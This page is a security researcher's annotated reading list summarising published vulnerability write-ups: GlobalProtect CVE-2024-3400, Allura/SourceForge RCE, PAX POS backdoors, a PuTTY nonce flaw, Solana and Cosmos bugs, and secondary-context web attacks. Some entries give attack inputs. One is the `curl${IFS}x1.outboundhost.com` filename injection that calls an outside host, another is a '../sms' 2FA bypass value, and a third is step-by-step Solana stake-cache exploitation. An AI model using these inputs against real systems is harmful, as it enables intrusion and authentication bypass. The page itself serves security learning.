Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)- 1397

WatchTowr    Reference →Posted 1 Year Ago
  • While fuzzing the Global Protect firewall, they noticed some interesting behavior in the logs. If they attached a semicolon to the SESSID parameter, some strange logs showed up - failed to unmarshal session(peekaboo) map, EOF. The EOF stands for end of file, which is super interesting. This is where the bug begins!
  • The EOF indicates that it's reading a file. Since we added the semicolon, there's no file with that inside of it. Adding in a slash for a directory gives us the nicer error failed to load file. Sick! It's reading a file and we're able to control this. What about directory traversal?
  • If it cannot find the directory, then it will attempt to create it. If the file doesn't exist, then it simply creates a zero byte file with the filename intact. By itself, this doesn't seem to have much of an impact. However, weird primitives lead to the breaking of security assumptions that may no longer be true. So, all we have to do is find some rule that we can violate.
  • Within the telemetry code, it is injesting log files. When doing this, it creates a curl command with shell capabilities to transfer the file. Now, there is an arbitrary file name in a bash command. That previous primitive seems super nice now! While playing around with this, they noticed that spaces weren't allowed within the cookie values. So, we have to get creative!
  • {IFS} can be used for a space within bash. So, if we create a filename with bash metacharacters, like semicolons or backticks, we can inject arbitrary commands! For instance, creating a file in the logs directory via traversal with `curl${IFS}x1.outboundhost.com` in the name will create an outbound curl request. Neat!
  • Although not mentioned in the original post, the vulnerability appears to be within an underlying library called Gorilla sessions. So, this primitive of writing arbitrary files likely affects A LOT more things than just this application.
  • Overall, an awesome post on a bizarre command injection. This took a weird arbitrary file write to trigger, but was interesting. To me, a takeaway is that fuzzing is useful but it's not a launch and let go. Instead, reading the error messages, responses and all other available information to look for weird behavior is worth while.

Dangerous Import: SourceForge Patches Critical Code Vulnerability- 1396

Stefan Schiller - Sonar Source    Reference →Posted 1 Year Ago
  • Apache Allura is used by many popular products. It is a site that managers source code, bug reports, discussions and many other things. SourceForge uses this under the hood.
  • Within the discussion area, users can import/export arbitrary files. Even though it should only ever be a URL, the file:// URI can be used. The file is added to the file locally, giving both an arbitrary file read and SSRF in one bug.
  • Using this, it's possible to read /etc/passwd. However, we can do better than that! Allura contains a global session key used to sign the sessions, which are pickle serialized. By reading the configuration file, it's possible to steal the key! Since we can now sign the pickle serialized files, we get trivial code execution.
  • I think the remediation is interesting. First (and most obvious) the URL is checked to be either http/https. Additionally, there are SSRF checks to ensure that it's not a local IP. Second, the pickle session storage was replaced with a JWT implementation to prevent RCE via this ever again. Overall, a simple bug leads to RCE in a popular thing.

Android-based PAX POS vulnerabilities (Part 1)- 1395

stmcyber    Reference →Posted 1 Year Ago
  • Many point of sale (POS) devices are going towards Android based systems instead of obscure custom made things. The authors of this post decided to review the PAX POS system for vulnerabilities. In part 1 of this post, they decided to go through mechanisms for attackers with local access to backdoor the device.
  • In fastboot, the hidden custom command oem paxassert can be used to overwrite the pax1 partition. This is a special partition that doesn't contain a filesystem but is a configuration map. Some values from this map are used in kernel parameters. From this, it is possible to inject our own kernel parameters to get root with a custom rootfs. For more information on the technique, they linked alphsecurity.
  • The unsigned partition exsn also had information concatenated to the kernel parameters. So, by flashing this partition, it's possible to get code execution using the same technique as before. In practice, adding spaces can be easily used to escape the context to add arbitrary parameters.
  • Within one of the Android apps, there is a command injection issue. It checks to see if the command starts with dumpsysx. However, simply appending a semi colon after this can be used to execute arbitrary commands afterwards. The PoC is done via ADB so I don't know how exploitable this actually is.
  • systool_server is a daemon exposed via Android binder with root privileges. It exposes the miniunz, where an attacker can add an arbitrary amount of flags and the input/output directory. Using this and symbolic links, it is possible to get an arbitrary file write primitive, since it's running as root.
  • The systool_server tool performs multiple checks for verifying the uid to ensure only specific users can execute this API. However, these can be bypassed with LD_PRELOAD. Honestly, I don't understand HOW this bypass works but that's what they claim.
  • There finally issue is a downgrade attack to a older signed/vulnerable version. TBH, being able to downgrade is a very common thing for functionality. For instance, what if the version you have doesn't work and you want to go backwards? Not a trivial thing to fix.
  • Overall, many of these attacks were interesting! Backdooring a device like this could be used to steal sensitive card information. Additionally, they have one CVE that is undisclosed that I'm curious to see what it is later!

Putty Private Key Recovery via Biased Nonce- 1394

Marcus Brinkmann    Reference →Posted 1 Year Ago
  • The digital signature algorithm (DSA) requires a number used once (nonce). If this number isn't random, then it's trivial to recover the private key. This is how Geo Hotz hacked the Playstation 3 back in the day.
  • Apparently, it's not JUST completely random. If there is missing randomness, then it's also possible to recover the private key. It's even one of the final questions on cryptopals.
  • Many programs use random nonces. However, some generate them deterministically via hashing and modulo over the ECDSA group, which is effectively random. For the P-521 curve, the number is so large that the upper 9 bits are guaranteed to be 0. Using the biased nonce attack, as seen in cryptopals, it's possible to get the private key in about 521/9=58 signatures with over 90% probability.
  • I don't understand the math on this but it's still interesting. Crazy to find this in Putty, such a popular product. Many cryptography things have unexpected footguns and should always be reviewed by professionals.

Mandrake (PFM) Vulnerability- 1393

Justin Tieri - Strange Love    Reference →Posted 1 Year Ago
  • In the Cosmos ecosystem, there is a cross chain communication framework called Interblockchain Communcation or IBC for short. On top of IBC, there is a middleware called Packet Forwarding Module (PFM). PFM will take an incoming IBC tx and forward it to the next chain in the list, allowing for multi-hop calls.
  • There are several parties involved with this:
    • Source chain: The blockchain that initiates the original IBC message.
    • Intermediary chain: The blockchain(s) that the PFM packet goes through in order to get to the destination.
    • Destination chain: The location in which the original packet was meant to be routed to.
  • When using ICS20 (which PFM uses) for token transfers, the memo stores the routing. Within ICS20, there is some magic that happens for handling assets from other chains. When going from the source to the destination, the tokens are escrowed in the source chain then a representation is minted on the destination. When going backwards, the minted token is burned and the escrowed token is unlocked. Because PFM is doing magic to route multiple ICS20 calls, there is a chance for error here.
  • PFM handles the responses from the destination chain to source chain for successes, errors and timeouts. However, some users were attempting to perform another PFM after their interactions on the destination chain back through the intermediary and source chain. When doing this, the internal accounts of funds got messed up when handling the error path.
  • In particular, the escrow account on the intermediary chain was not properly updating the total supply. Since the escrowed account only has so many funds, this could result in funds being inaccessible from the errors. According to the post, this bug was discovered while trying to debug an IBC client on a real network. Yikes! Luckily, it wasn't possible to steal funds using this issue.
  • The developers said that this wasn't caught because of missing test cases in their end to end test setup. They urge deves to write good unit, integration and e2e tests whenever possible. Another interesting bit to this is testing IBC applications is hard to do - you need to setup multiple blockchains for multiple situations, which is difficult.

Nonce Upon a Time, or a Total Loss of Funds - Exploring Solana Core Part 3 - 1392

Neodyme    Reference →Posted 1 Year Ago
  • Preventing the replay of previous transactions is important for the security of Solana and most blockchain systems. The obvious way would be to check if a signature had already been seen. However, this runs into scaling issues with over 150B transactions and signature malleability issues. So, something else needs to be done.
  • The initial solution was to just not allow transactions that are too old. In particular, if the signature contains an out of date blockhash, then it can be safely ignored. This strategy doesn't work with offline signing though. If the transaction is signed offline then the blockhash may have expired. Since some users want to do things offline with their key, there needs to be another way.
  • Durable Transaction Nonces are a number used once (nonce) stored on chain ahead of time. Instead of putting the blockhash, the nonce is used. After the nonce is used, a new value is generated and stored on chain for the account. Of course, this must be done in both failed and successful calls in order to prevent unintentional execution of the transaction later. This functionality is complicated and very nuanced.
  • Most of the time, the Solana core expects all state to rollback for failure. For instance, writing to an account that you don't own will result in failure. The author points out that "Special cases lead to complexity, and complexity leads to bugs." which I couldn't agree with more! This is a little thing that if not done correctly could cause major havoc.
  • There is a match expression written in Rust that checks three cases - tx succeeded with nonce, tx succeeded with hash and whether an error occurred. The success case for the nonce case actually takes in both succeeded and failed transactions with state writes! What does this mean? Even illegal state writes, such as cross account, can persist. It seems like illegal is different than a regular failure in this context - so, errors get funky leading to the bug.
  • This completely breaks the entire security model of the system. One account can write to another account with arbitrary value. This is an absolute 100% game over, as far as Solana bugs go. At the point this bug was found, $10B was on Solana. I hope they got a huge bug bounty for this find!
  • This is a crazy bug that destroys the entire run time. I think the authors make a really good point that sticks with me - "As a rule of thumb, we recommend that you double-check special cases and complex code". If there is interwoven logic with weird case statements, it's a great place to look for bugs. Subtle calling patterns and unexpected errors can break this code very quickly.

How To Cheat The Staking Mechanism - Exploring Solana Core Part 2 - 1391

Neodyme    Reference →Posted 1 Year Ago
  • Solana is a proof of stake network. So, the more value you provide in Solana, the more power you have in the voting process. With 2/3 of the control, changes to the state can be made. Clearly, ensuring that the staking and voting power is done properly is important.
  • To stake funds, a user 1) creates an account 2) delegates the account) and 3) becomes activated. However, parsing all of the staked chain state every block would be incredibly inefficient. So, instead, a cache or running total is kept instead. If something relevant to the cache has changed then it makes an update to the cache.
  • Solana allows active stake accounts to be merged. This will close one account and add the stakes to the other account without cooldown. When doing this, it does the detection by checking if the closed account has zero funds in it. Normally, this is the case, since the staking program address will do this.
  • However, there is a logic bug here - it's possible to add funds to the old staking account so that it's not properly reaped. If this is done, then the key isn't removed from the cache! So, we can reuse the same staked values in multiple accounts by exploiting this logic flaw.
  • To exploit, here are the steps:
    1. Create two staking accounts.
    2. Consolidate one account into the other.
    3. Add one lamport into the closed account.
    4. Solana core doesn't update the cache for the closed program because it has value.
    5. Recreate the vote account. The delegation is still there and the cache still doesn't get updated properly.
  • To fix the vulnerability, the account is attempted to be deserialized instead of a zero funds check. Overall, a super interesting post on the desync between reality and the understanding of reality.

How a Little-Known Solana Feature Made Program Vaults Unsafe - Exploring Solana Core Part 1 - 1390

Neodyme    Reference →Posted 1 Year Ago
  • Solana is a blockchain that allows for the execution of arbitrary Rust code. The main difference is that information is stored in accounts - both code and data.
  • Program Derived Addresses (PDAs) are public keys that are derived from the address of the program itself. By using a specific seed, the address can be bumped off of the elliptic curve to ensure there is no valid key for it. To generate the PDA, the following valued are used then hashed: hash(seed + program_id + "ProgramDerivedAddress"). When using PDAs, it is cumbersome because a private key must be created for the account and sign the transaction with it.
  • As an alternative, create_with_seed was made. This is a feature of the system program. So, it can create an account and assign ownership to the account. The address of this is calculated by hash(base + seed + owner).
  • These two methods are pretty similar in how they generate code, right? Since there are no separators or unique prefixes for this in Solana, there is the potential for a hash collision! There some constraints though, such as account being system owned and the first 21 bytes of the program_id being valid UTF-8 (1 out of 180K).
  • How would this been useful? A collision like this could have allowed for an awesome rug pull mechanism. There is no way an audit would have caught this either. This was fixed by ensuring that the owner of a seeded account cannot end with ProgramDerivedAddress.

How to freely borrow all the TVL from the Jet Protocol- 1389

Jayne    Reference →Posted 1 Year Ago
  • Jet Protocol was a lending and borrowing protocol built on Solana. The function _market_value() is used to determine the total market value of the loans that had been taken out. So, if this function was broken in some way, you would be able to bypass the protection to take out arbitrary loans.
  • Recently, the protocol had implemented the capability to close a Solana account. Upon doing this, the account is set back to the Pubkey::default value and gives back some of the rent costs.
  • However, the collateral to loan ratio using the function _market_value() has a fatal control flow flaw with this new functionality. It is using Pubkey::default as the indicator to exit the list. So, if an account is closed then this function is interacted with, the loop will exit early!
  • Overall, a fairly simple issue of default values leads to a complete rug pull. To me, the verification of a default value is a red flag and should try to be avoided of things like this. Good find!

Attacking Secondary Contexts in Web Applicarions- 1388

Sam Curry    Reference →Posted 1 Year Ago
  • Web servers are not exposing files on a server in a simple way anymore. Instead, they use proxy's, load balancers and fetch responses from other servers locally. Weird application routing can be used to cause some major havoc.
  • How do we identify these types of routing when we're blind? Using directory traversal and fuzzing for control characters (#,?,&,/,.@) is a good way to find this. Another detection is changes in response for certain directories, such as the headers of a response changing. Finally, stack traces or wrapped responses can be good here as well.
  • What kinds of security issues can we find with this? Data being served across extra layers causes weird issues. HTTP smuggling and CRLF injection can be found in some weird places. Second, since developers don't expect users to be able to control parameters and paths here it causes uber havoc on the endpoint. Adding debug flags or traversing up the directory can access unintended functionality.
  • Information disclosure is a bad one here as well. Internal HTTP headers and access tokens come to find. SSRF from here is dangerous to return data instead of asking the internal network.
  • What types of issues will we run into as a hacker? Directory traversal may not work - not everything will handle these. Another thing is that some servers will still be authed with the same headers or cookies as the original request, making nothing exploitable. A difficult part is guessing the paths, mostly because this is blind. To get around this, we need to have a good context of the rest of the application, brute forcing and a bunch of guess work.
  • Sam has a ton of case studies of this. One interesting case was with Authy (2FA) integration with Pinterest. The application was only checking that the request returned a 200 and the response was {"success":true}. When taking the code from the user and verifying it within Authy, there was a directory traversal on this. To exploit this, simply using ../sms for the 2FA code would return success to bypass the 2FA!
  • A classic case was a directory traversal in invoice routing. If you knew somebody's email on this back-end service, you can traverse back up twice, place an email, place an ID and get invoices cross account.
  • A few takeaways for me. First, these types of bugs are out there but are difficult to triage what to do next. Innovations on the blind discovery of things would be amazing for bug hunting. Next, sanitization is hard for URLs in these cases with extremely complicated bugs. Overall, great find!